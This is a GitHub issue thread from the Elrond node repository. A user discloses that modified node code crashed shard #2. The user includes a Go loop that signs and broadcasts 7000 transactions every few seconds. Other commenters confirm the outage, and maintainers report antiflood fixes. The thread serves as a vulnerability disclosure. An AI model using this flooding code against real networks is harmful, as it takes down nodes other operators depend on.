### ISSUE TITLE
Crashing shard #2

### ISSUE THREAD

**Issue by drdelphi** [ElrondNetwork/elrond-go#610]
I modified:

const numGoRoutines = 100000
in interceptorsContainerFactory.go

const broadcastGoRoutines = 100000
in netMessenger.go

I added the following lines in node.go, func startSendingHeartbeats

		for i := 0; i < 7000; i++ {
			sender := "e7d49e3de9fb37457cb46852025e825f6f8448be1b4725a1d988e6c93ff7a3ee"
			receiver := "e7d49e3de9fb37457cb46852025e825f6f8448be1b4725a1d988e6c93ff7a3ee"
			value := big.NewInt(1)
			hexSender, _ := hex.DecodeString(sender)
			hexReceiver, _ := hex.DecodeString(receiver)
			m, _ := n.marshalizer.Marshal(&transaction.Transaction{
				Nonce:    nonce,
				SndAddr:  hexSender,
				RcvAddr:  hexReceiver,
				Value:    value,
				GasPrice: 10,
				GasLimit: 100,
			})
			signature, _ := n.txSingleSigner.Sign(n.txSignPrivKey, m)
			n.SendTransaction(nonce, sender, receiver, value, 10, 100, "", signature)
			nonce++
		}

I also modified hearbeat interval to 2-3 seconds, so this was sending 7000 txs every 2-3 seconds.
Sorry for crashing shard #2. I only let my node run for a few minutes.

**Comment by Mystic999** [comment]
Подтверждать. Мой узел на shard2 был полностью остановлен и был отключен в течение нескольких часов. Я знаю по крайней мере одного другого пользователя, у которого только узел на shard2 остановлен. Это было похоже на DDos атаку

**Comment by iulianpascalau** [comment]
Great attack! We have improved the anti flooding mechanism (and are currently improving it) because of this attack.

**Comment by iulianpascalau** [comment]
This is fixed by the #787 and subsequent antiflood fixes.
